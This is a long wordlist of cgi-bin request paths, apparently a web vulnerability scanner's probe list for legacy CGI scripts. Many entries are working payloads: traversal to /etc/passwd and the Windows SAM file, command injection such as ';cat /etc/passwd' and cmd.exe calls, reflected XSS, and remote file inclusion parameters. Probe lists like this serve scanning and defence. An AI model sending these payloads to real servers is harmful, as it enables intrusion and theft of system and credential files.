cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
cgi-bin/%2e%2e/abyss.conf
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/.access
cgi-bin/.cobalt
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
cgi-bin/.fhp
cgi-bin/.htaccess
cgi-bin/.htaccess.old
cgi-bin/.htaccess.save
cgi-bin/.htaccess~
cgi-bin/.htpasswd
cgi-bin/.nsconfig
cgi-bin/.passwd
cgi-bin/.www_acl
cgi-bin/.wwwacl
cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
cgi-bin//_vti_pvt/doctodep.btr
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/AT-admin.cgi
cgi-bin/AT-generate.cgi
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
cgi-bin/AnyBoard.cgi
cgi-bin/AnyForm
cgi-bin/AnyForm2
cgi-bin/Backup/add-passwd.cgi
cgi-bin/CGImail.exe
cgi-bin/CSMailto.cgi
cgi-bin/CSMailto/CSMailto.cgi
cgi-bin/Cgitest.exe
cgi-bin/Count.cgi
cgi-bin/DCFORMS98.CGI
cgi-bin/DCShop/auth_data/auth_user_file.txt
cgi-bin/DCShop/orders/orders.txt
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
cgi-bin/GW5/GWWEB.EXE
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
cgi-bin/GWWEB.EXE?HELP=bad-request
cgi-bin/ImageFolio/admin/admin.cgi
cgi-bin/MachineInfo
cgi-bin/MsmMask.exe
cgi-bin/MsmMask.exe?mask=/junk334
cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
cgi-bin/Pbcgi.exe
cgi-bin/SGB_DIR/superguestconfig
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
cgi-bin/Upload.pl
cgi-bin/VsSetCookie.exe?
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
cgi-bin/WS_FTP.ini
cgi-bin/Webnews.exe
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/add_ftp.cgi
cgi-bin/addbanner.cgi
cgi-bin/adduser.cgi
cgi-bin/admin.cgi
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/admin.php
cgi-bin/admin.php3
cgi-bin/admin.pl
cgi-bin/admin/admin.cgi
cgi-bin/admin/setup.cgi
cgi-bin/adminhot.cgi
cgi-bin/adminwww.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/aglimpse
cgi-bin/aglimpse.cgi
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/amadmin.pl
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/anyboard.cgi
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
cgi-bin/archie
cgi-bin/architext_query.cgi
cgi-bin/architext_query.pl
cgi-bin/ash
cgi-bin/astrocam.cgi
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/auctiondeluxe/auction.pl
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awl/auctionweaver.pl
cgi-bin/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/ax-admin.cgi
cgi-bin/ax.cgi
cgi-bin/axs.cgi
cgi-bin/badmin.cgi
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/bash
cgi-bin/bb-ack.sh
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-histlog.sh
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-rep.sh
cgi-bin/bb-replog.sh
cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
cgi-bin/bbs_forum.cgi
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
cgi-bin/bigconf.cgi
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/
cgi-bin/blog/mt-check.cgi
cgi-bin/blog/mt-load.cgi
cgi-bin/blog/mt.cfg
cgi-bin/bnbform
cgi-bin/bnbform.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/bsguest.cgi?email=x;ls
cgi-bin/bslist.cgi?email=x;ls
cgi-bin/build.cgi
cgi-bin/bulk/bulk.cgi
cgi-bin/c32web.exe/ChangeAdminPassword
cgi-bin/c_download.cgi
cgi-bin/cached_feed.cgi
cgi-bin/cachemgr.cgi
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/calendar
cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
cgi-bin/calendar.pl
cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calendar/index.cgi
cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
cgi-bin/calender_admin.pl
cgi-bin/campas?%0acat%0a/etc/passwd%0a
cgi-bin/cart.pl
cgi-bin/cart.pl?db='
cgi-bin/cartmanager.cgi
cgi-bin/cbmc/forums.cgi
cgi-bin/ccbill-local.cgi?cmd=MENU
cgi-bin/ccbill-local.pl?cmd=MENU
cgi-bin/cfgwiz.exe
cgi-bin/cgforum.cgi
cgi-bin/cgi-lib.pl
cgi-bin/cgi-test.exe
cgi-bin/cgi_process
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/cgicso?query=AAA
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cgimail.exe
cgi-bin/cgitest.exe
cgi-bin/cgiwrap
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
cgi-bin/cgiwrap/~@USERS
cgi-bin/cgiwrap/~JUNK(5)
cgi-bin/cgiwrap/~root
cgi-bin/change-your-password.pl
cgi-bin/classifieds
cgi-bin/classifieds.cgi
cgi-bin/classifieds/classifieds.cgi
cgi-bin/classifieds/index.cgi
cgi-bin/clickcount.pl?view=test
cgi-bin/clickresponder.pl
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd1.exe?/c+dir
cgi-bin/code.php
cgi-bin/code.php3
cgi-bin/com5...................................................................................................................................................................................................
cgi-bin/com5.java
cgi-bin/com5.pl
cgi-bin/commandit.cgi
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/common/listrec.pl
cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
cgi-bin/compatible.cgi
cgi-bin/contents.htm
cgi-bin/count.cgi
cgi-bin/counter-ord
cgi-bin/counterbanner
cgi-bin/counterbanner-ord
cgi-bin/counterfiglet-ord
cgi-bin/counterfiglet/nc/
cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csNews.cgi
cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
cgi-bin/csPassword.cgi
cgi-bin/csPassword/csPassword.cgi
cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
cgi-bin/csh
cgi-bin/cstat.pl
cgi-bin/cutecast/members/
cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
cgi-bin/dasp/fm_shell.asp
cgi-bin/data/fetch.php?page=
cgi-bin/date
cgi-bin/day5datacopier.cgi
cgi-bin/day5datanotifier.cgi
cgi-bin/db2www/library/document.d2w/show
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/db_manager.cgi
cgi-bin/dbman/db.cgi?db=no-db
cgi-bin/dbmlparser.exe
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcshop/auth_data/auth_user_file.txt
cgi-bin/dcshop/orders/orders.txt
cgi-bin/dfire.cgi
cgi-bin/diagnose.cgi
cgi-bin/dig.cgi
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/displayTC.pl
cgi-bin/dnewsweb
cgi-bin/donothing
cgi-bin/dose.pl?daily&somefile.txt&|ls|
cgi-bin/dumpenv.pl
cgi-bin/echo.bat
cgi-bin/echo.bat?&dir+c:\
cgi-bin/edit.pl
cgi-bin/empower?DB=whateverwhatever
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/enter.cgi
cgi-bin/environ.cgi
cgi-bin/environ.pl
cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
cgi-bin/ex-logger.pl
cgi-bin/excite
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/ezshopper2/loadpage.cgi
cgi-bin/ezshopper3/loadpage.cgi
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/filemail
cgi-bin/filemail.pl
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail.pl
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/fortune
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/fpadmin.htm
cgi-bin/fpremadm.exe
cgi-bin/fpsrvadm.exe
cgi-bin/ftp.pl
cgi-bin/ftpsh
cgi-bin/gH.cgi
cgi-bin/gbadmin.cgi?action=change_adminpass
cgi-bin/gbadmin.cgi?action=change_automail
cgi-bin/gbadmin.cgi?action=colors
cgi-bin/gbadmin.cgi?action=setup
cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
cgi-bin/gbpass.pl
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/getdoc.cgi
cgi-bin/gettransbitmap
cgi-bin/glimpse
cgi-bin/gm-cplog.cgi
cgi-bin/gm.cgi
cgi-bin/guestbook.cgi
cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
cgi-bin/guestbook.pl
cgi-bin/handler
cgi-bin/handler/netsonar;cat
cgi-bin/hello.bat?&dir+c:\
cgi-bin/hitview.cgi
cgi-bin/horde/test.php
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/htimage.exe
cgi-bin/htimage.exe/path/filename?2,2
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/htsearch?-c/nonexistant
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/ibill.pm
cgi-bin/icat
cgi-bin/if/admin/nph-build.cgi
cgi-bin/ikonboard/help.cgi?
cgi-bin/imageFolio.cgi
cgi-bin/imagefolio/admin/admin.cgi
cgi-bin/imagemap
cgi-bin/imagemap.exe
cgi-bin/include/new-visitor.inc.php
cgi-bin/index.js0x70
cgi-bin/index.pl
cgi-bin/info2www
cgi-bin/infosrch.cgi
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
cgi-bin/ion-p?page=../../../../../etc/passwd
cgi-bin/jailshell
cgi-bin/jj
cgi-bin/journal.cgi?folder=journal.cgi%00
cgi-bin/ksh
cgi-bin/lastlines.cgi?process
cgi-bin/listrec.pl
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/log-reader.cgi
cgi-bin/log/
cgi-bin/log/nether-log.pl?checkit
cgi-bin/login.cgi
cgi-bin/login.pl
cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
cgi-bin/logit.cgi
cgi-bin/logs.pl
cgi-bin/logs/
cgi-bin/logs/access_log
cgi-bin/logs/error_log
cgi-bin/lookwho.cgi
cgi-bin/ls
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
cgi-bin/mail
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mailform.exe
cgi-bin/mailit.pl
cgi-bin/maillist.cgi
cgi-bin/maillist.pl
cgi-bin/mailnews.cgi
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/main_menu.pl
cgi-bin/majordomo.pl
cgi-bin/man.sh
cgi-bin/man2html
cgi-bin/mastergate/search.cgi?search=0&search_on=all
cgi-bin/meta.pl
cgi-bin/mgrqcgi
cgi-bin/mini_logger.cgi
cgi-bin/minimal.exe
cgi-bin/mkilog.exe
cgi-bin/mkplog.exe
cgi-bin/mmstdod.cgi
cgi-bin/moin.cgi?test
cgi-bin/mojo/mojo.cgi
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/ms_proxy_auth_query/
cgi-bin/mt-static/
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt-static/mt.cfg
cgi-bin/mt/
cgi-bin/mt/mt-check.cgi
cgi-bin/mt/mt-load.cgi
cgi-bin/mt/mt.cfg
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/musicqueue.cgi
cgi-bin/myguestbook.cgi?action=view
cgi-bin/namazu.cgi
cgi-bin/nbmember.cgi?cmd=list_all_users
cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/netpad.cgi
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/nimages.php
cgi-bin/nlog-smb.cgi
cgi-bin/nlog-smb.pl
cgi-bin/non-existent.pl
cgi-bin/noshell
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/nph-error.pl
cgi-bin/nph-exploitscanget.cgi
cgi-bin/nph-maillist.pl
cgi-bin/nph-publish
cgi-bin/nph-publish.cgi
cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
cgi-bin/nph-test-cgi
cgi-bin/ntitar.pl
cgi-bin/opendir.php?/etc/passwd
cgi-bin/orders/orders.txt
cgi-bin/pagelog.cgi
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/parse-file
cgi-bin/pass
cgi-bin/passwd
cgi-bin/passwd.txt
cgi-bin/password
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/perl
cgi-bin/perl.exe
cgi-bin/perl.exe?-v
cgi-bin/perl?-v
cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/phf
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/photo/
cgi-bin/photo/manage.cgi
cgi-bin/php-cgi
cgi-bin/php.cgi?/etc/passwd
cgi-bin/plusmail
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/pollssi.cgi
cgi-bin/post-query
cgi-bin/post16.exe
cgi-bin/post32.exe|dir%20c:\
cgi-bin/post_query
cgi-bin/postcards.cgi
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ppdscgi.exe
cgi-bin/printenv
cgi-bin/printenv.tmp
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/processit.pl
cgi-bin/profile.cgi
cgi-bin/pu3.pl
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/query
cgi-bin/query?mss=%2e%2e/config
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/quikstore.cfg
cgi-bin/quizme.cgi
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/ratlog.cgi
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
cgi-bin/redirect
cgi-bin/register.cgi
cgi-bin/replicator/webpage.cgi/
cgi-bin/responder.cgi
cgi-bin/retrieve_password.pl
cgi-bin/rguest.exe
cgi-bin/rightfax/fuwww.dll/?
cgi-bin/rksh
cgi-bin/rmp_query
cgi-bin/robadmin.cgi
cgi-bin/robpoll.cgi
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/rtm.log
cgi-bin/rwcgi60
cgi-bin/rwcgi60/showenv
cgi-bin/rwwwshell.pl
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/scoadminreg.cgi
cgi-bin/scripts/*%0a.pl
cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
cgi-bin/search
cgi-bin/search.cgi
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
cgi-bin/search.pl
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/sendform.cgi
cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/sensepost.exe?/c+dir
cgi-bin/session/adminlogin
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/sh
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/shop.pl/page=;cat%20shop.pl|
cgi-bin/shop/auth_data/auth_user_file.txt
cgi-bin/shop/orders/orders.txt
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
cgi-bin/show.pl
cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
cgi-bin/showuser.cgi
cgi-bin/shtml.dll
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
cgi-bin/simplestguest.cgi
cgi-bin/simplestmail.cgi
cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/spin_client.cgi?aaaaaaaa
cgi-bin/ss
cgi-bin/sscd_suncourier.pl
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/stat.pl
cgi-bin/stat/
cgi-bin/stats-bin-p/reports/index.html
cgi-bin/stats.pl
cgi-bin/stats.prf
cgi-bin/stats/
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
cgi-bin/stats_old/
cgi-bin/statsconfig
cgi-bin/statusconfig.pl
cgi-bin/statview.pl
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
cgi-bin/store/agora.cgi?page=whatever33.html
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/survey
cgi-bin/survey.cgi
cgi-bin/sws/admin.html
cgi-bin/sws/manager.pl
cgi-bin/tablebuild.pl
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/test-cgi
cgi-bin/test-cgi.bat
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/test-cgi.tcl
cgi-bin/test-cgi?/*
cgi-bin/test-env
cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/test.cgi
cgi-bin/test/test.cgi
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/testcgi.exe
cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
cgi-bin/testing_whatever
cgi-bin/texis.exe/junk
cgi-bin/texis/junk
cgi-bin/texis/phine
cgi-bin/textcounter.pl
cgi-bin/tidfinder.cgi
cgi-bin/tigvote.cgi
cgi-bin/title.cgi
cgi-bin/tpgnrock
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/troops.cgi
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/ultraboard.cgi
cgi-bin/ultraboard.pl
cgi-bin/unlg1.1
cgi-bin/unlg1.2
cgi-bin/update.dpgs
cgi-bin/upload.cgi
cgi-bin/uptime
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/utm/admin
cgi-bin/utm/utm_stat
cgi-bin/view-source
cgi-bin/view-source?view-source
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
cgi-bin/viewlogs.pl
cgi-bin/viewsource?/etc/passwd
cgi-bin/viralator.cgi
cgi-bin/virgil.cgi
cgi-bin/visadmin.exe
cgi-bin/visitor.exe
cgi-bin/vote.cgi
cgi-bin/vpasswd.cgi
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/wais.pl
